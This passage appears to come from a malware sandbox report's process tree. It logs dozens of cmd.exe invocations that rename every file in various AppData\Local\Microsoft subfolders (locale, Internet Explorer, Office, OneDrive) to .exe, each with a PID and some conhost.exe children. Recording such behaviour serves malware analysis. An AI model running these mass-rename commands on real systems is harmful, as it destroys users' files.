      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-SN\*.*" "*.exe"
        6⤵
        
        PID:720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\gl-ES\*.*" "*.exe"
        6⤵
        
        PID:236
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ha-Latn-NG\*.*" "*.exe"
        6⤵
        
        PID:1452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\he-IL\*.*" "*.exe"
        6⤵
        
        PID:5112
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hi-IN\*.*" "*.exe"
        6⤵
        
        PID:3556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hr-BA\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hr-HR\*.*" "*.exe"
        6⤵
        
        PID:3340
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hu-HU\*.*" "*.exe"
        6⤵
        
        PID:692
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hy-AM\*.*" "*.exe"
        6⤵
        
        PID:3652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\id-ID\*.*" "*.exe"
        6⤵
        
        PID:3916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\it-CH\*.*" "*.exe"
        6⤵
        
        PID:2196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\it-IT\*.*" "*.exe"
        6⤵
        
        PID:4788
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ka-GE\*.*" "*.exe"
        6⤵
        
        PID:572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\kk-KZ\*.*" "*.exe"
        6⤵
        
        PID:1652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\lt-LT\*.*" "*.exe"
        6⤵
        
        PID:1408
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\lv-LV\*.*" "*.exe"
        6⤵
        
        PID:2428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\mk-MK\*.*" "*.exe"
        6⤵
        
        PID:1992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ms-BN\*.*" "*.exe"
        6⤵
        
        PID:4740
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3676
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ms-MY\*.*" "*.exe"
        6⤵
        
        PID:4828
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nb-NO\*.*" "*.exe"
        6⤵
        
        PID:4660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nl-BE\*.*" "*.exe"
        6⤵
        
        PID:1660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nl-NL\*.*" "*.exe"
        6⤵
        
        PID:2092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pl-PL\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pt-BR\*.*" "*.exe"
        6⤵
        
        PID:416
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pt-PT\*.*" "*.exe"
        6⤵
        
        PID:976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ro-MD\*.*" "*.exe"
        6⤵
        
        PID:3836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ro-RO\*.*" "*.exe"
        6⤵
        
        PID:740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ru-RU\*.*" "*.exe"
        6⤵
        
        PID:4856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sk-SK\*.*" "*.exe"
        6⤵
        
        PID:572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sl-SI\*.*" "*.exe"
        6⤵
        
        PID:1524
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sq-AL\*.*" "*.exe"
        6⤵
        
        PID:4704
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-BA\*.*" "*.exe"
        6⤵
        
        PID:1916
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-ME\*.*" "*.exe"
        6⤵
        
        PID:3680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-RS\*.*" "*.exe"
        6⤵
        
        PID:3056
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-BA\*.*" "*.exe"
        6⤵
        
        PID:2128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-ME\*.*" "*.exe"
        6⤵
        
        PID:1872
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-RS\*.*" "*.exe"
        6⤵
        
        PID:2832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sv-FI\*.*" "*.exe"
        6⤵
        
        PID:2804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sv-SE\*.*" "*.exe"
        6⤵
        
        PID:3728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\tr-TR\*.*" "*.exe"
        6⤵
        
        PID:3476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\uk-UA\*.*" "*.exe"
        6⤵
        
        PID:2168
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4368
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\uz-Latn-UZ\*.*" "*.exe"
        6⤵
        
        PID:1564
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\*.*" "*.exe"
        6⤵
        
        PID:1428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\CacheStorage\*.*" "*.exe"
        6⤵
        
        PID:656
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\*.*" "*.exe"
        6⤵
        
        PID:1092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\*.*" "*.exe"
        6⤵
        
        PID:2860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Indexed DB\*.*" "*.exe"
        6⤵
        
        PID:4344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming\*.*" "*.exe"
        6⤵
        
        PID:3680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\*.*" "*.exe"
        6⤵
        
        PID:3144
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\9gmgzgt\*.*" "*.exe"
        6⤵
        
        PID:2128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Indexed DB\EDGE\*.*" "*.exe"
        6⤵
        
        PID:1872
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\*.*" "*.exe"
        6⤵
        
        PID:1768
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\*.*" "*.exe"
        6⤵
        
        PID:2312
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000499B\*.*" "*.exe"
        6⤵
        
        PID:252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\*.*" "*.exe"
        6⤵
        
        PID:552
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\*.*" "*.exe"
        6⤵
        
        PID:1760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Licenses\*.*" "*.exe"
        6⤵
        
        PID:2428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\*.*" "*.exe"
        6⤵
        
        PID:4704
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\*.*" "*.exe"
        6⤵
        
        PID:2860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\*.*" "*.exe"
        6⤵
        
        PID:1576
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\*.*" "*.exe"
        6⤵
        
        PID:4128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3296
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\*.*" "*.exe"
        6⤵
        
        PID:2740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\*.*" "*.exe"
        6⤵
        
        PID:1660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\*.*" "*.exe"
        6⤵
        
        PID:3336
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Licenses\5\*.*" "*.exe"
        6⤵
        
        PID:416
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\*.*" "*.exe"
        6⤵
        
        PID:2196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\*.*" "*.exe"
        6⤵
        
        PID:1160
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\*.*" "*.exe"
        6⤵
        
        PID:2088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\*.*" "*.exe"
        6⤵
        
        PID:4600
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\*.*" "*.exe"
        6⤵
        
        PID:3412
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\*.*" "*.exe"
        6⤵
        
        PID:3128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\*.*" "*.exe"
        6⤵
        
        PID:4800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4632
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\*.*" "*.exe"
        6⤵
        
        PID:2680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ar\*.*" "*.exe"
        6⤵
        
        PID:4392
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\arm64\*.*" "*.exe"
        6⤵
        
        PID:1076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\as-IN\*.*" "*.exe"
        6⤵
        
        PID:4648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\az-Latn-AZ\*.*" "*.exe"
        6⤵
        
        PID:2832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\*.*" "*.exe"
        6⤵
        
        PID:4700
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\*.*" "*.exe"
        6⤵
        
        PID:896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-BD\*.*" "*.exe"
        6⤵
        
        PID:1580
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\*.*" "*.exe"
        6⤵
        
        PID:3316
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bs-Latn-BA\*.*" "*.exe"
        6⤵
        
        PID:1152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\*.*" "*.exe"
        6⤵
        
        PID:1616
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\*.*" "*.exe"
        6⤵
        
        PID:2212
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\*.*" "*.exe"
        6⤵
        
        PID:252
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:424
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\*.*" "*.exe"
        6⤵
        
        PID:4828
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\da\*.*" "*.exe"
        6⤵
        
        PID:4720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\*.*" "*.exe"
        6⤵
        
        PID:3044
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\*.*" "*.exe"
        6⤵
        
        PID:1660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\*.*" "*.exe"
        6⤵
        
        PID:4364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\*.*" "*.exe"
        6⤵
        
        PID:3144
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\*.*" "*.exe"
        6⤵
        
        PID:3340
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\*.*" "*.exe"
        6⤵
        
        PID:3588
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\et\*.*" "*.exe"
        6⤵
        
        PID:2304
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\*.*" "*.exe"
        6⤵
        
        PID:3560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fa\*.*" "*.exe"
        6⤵
        
        PID:4976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\*.*" "*.exe"
        6⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\*.*" "*.exe"
        6⤵
        
        PID:1796
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fr\*.*" "*.exe"
        6⤵
        
        PID:656
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\*.*" "*.exe"
        6⤵
        
        PID:4812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\*.*" "*.exe"
        6⤵
        
        PID:424
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gl\*.*" "*.exe"
        6⤵
        
        PID:2632
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\*.*" "*.exe"
        6⤵
        
        PID:3556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\*.*" "*.exe"
        6⤵
        
        PID:3472
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\*.*" "*.exe"
        6⤵
        
        PID:3856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\*.*" "*.exe"
        6⤵
        
        PID:1696
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hr\*.*" "*.exe"
        6⤵
        
        PID:1092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\*.*" "*.exe"
        6⤵
        
        PID:4964
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\*.*" "*.exe"
        6⤵
        
        PID:3652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\*.*" "*.exe"
        6⤵
        
        PID:4152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\*.*" "*.exe"
        6⤵
        
        PID:456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\imageformats\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\*.*" "*.exe"
        6⤵
        
        PID:3916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\IRMProtectors\*.*" "*.exe"
        6⤵
        
        PID:4252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\is\*.*" "*.exe"
        6⤵
        
        PID:656
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\*.*" "*.exe"
        6⤵
        
        PID:1760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\*.*" "*.exe"
        6⤵
        
        PID:248
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ka\*.*" "*.exe"
        6⤵
        
        PID:3452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\*.*" "*.exe"
        6⤵
        
        PID:3356
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\km-KH\*.*" "*.exe"
        6⤵
        
        PID:1476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kn\*.*" "*.exe"
        6⤵
        
        PID:3164
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\*.*" "*.exe"
        6⤵
        
        PID:1916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\*.*" "*.exe"
        6⤵
        
        PID:2808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\*.*" "*.exe"
        6⤵
        
        PID:5108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\*.*" "*.exe"
        6⤵
        
        PID:1852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lb-LU\*.*" "*.exe"
        6⤵
        
        PID:3448
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lt\*.*" "*.exe"
        6⤵
        
        PID:4152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\*.*" "*.exe"
        6⤵
        
        PID:4600
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mi-NZ\*.*" "*.exe"
        6⤵
        
        PID:792
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2604
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\*.*" "*.exe"
        6⤵
        
        PID:564
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\*.*" "*.exe"
        6⤵
        
        PID:896
      - C:\Windows\System32\cmd.exe
        
